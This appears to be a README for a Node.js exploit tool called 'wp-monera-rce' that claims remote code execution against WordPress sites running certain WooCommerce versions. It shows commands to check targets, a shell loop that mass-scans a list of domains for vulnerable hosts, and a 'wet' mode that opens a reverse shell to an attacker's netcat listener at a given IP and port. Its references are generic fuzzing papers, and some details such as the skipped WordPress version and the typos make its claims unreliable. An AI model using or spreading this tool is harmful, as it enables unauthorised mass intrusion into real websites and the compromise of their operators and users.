An RCE in Wordpress 5.9, 6.0 and 6.2 with installed WooCommerce plugin versions 7.8.2 to 8.3.0 has been found using the technique of
machine learning-based fuzzing (see references).
We called the exploit monera.
POC
Test for vulenrability
Non-vulnerable host
node src/wp-monera-rce.js --dry --target https://example1.com
checking...
woocommerce plugin is not installed, not vulnerable, bye
Vulnerable
node src/wp-monera-rce.js --dry --target https://example2.com
checking...
woocommerce v 7.8.3 is found, vulnerable, bye
Run in batch
You can run the script in loop to find all vulnerable targets:
while read -r line; do
node src/wp-monera-rce.js --dry --silent --target $line
done < domains.txt
will echo all vulnerable hosts from the list.
Exploit
Open a listening port on your attacking machine:
nc -l 10000
and run the exploit with
node src/wp-monera-rce.js --wet --to $my_attacking_host_ip:$my_attacking_host_port --target https://example2.com
checking...
woocommerce v 7.8.3 is found, vulnerable
creating remote shell to 51.19.23.2:10000...
connection established successfully
You are supposed to get remote shell on nc connection with web server permissions (apache or nginx, what ever runs wordpress).
Run
Prerequisites
nodejs is required to be installed on the system.
Clone
git clone git@bitbucket.org:0xsky/wp-monera-rce.git
cd wp-monera-rce
npm install
node src/wp-monera-rce.js --version
References
- “Fuzzing-based hard-label black-box attacks against machine learning models”, https://doi.org/10.1016/j.cose.2022.102694
- “Detecting prototype pollution for node.js: Vulnerability review and new fuzzing inputs”, https://doi.org/10.1016/j.cose.2023.103625
- “An Abstract Syntax Tree based static fuzzing mutation for vulnerability evolution analysis”, https://doi.org/10.1016/j.infsof.2023.107194
- “A systematic review of fuzzing techniques”, https://doi.org/10.1016/j.cose.2018.02.002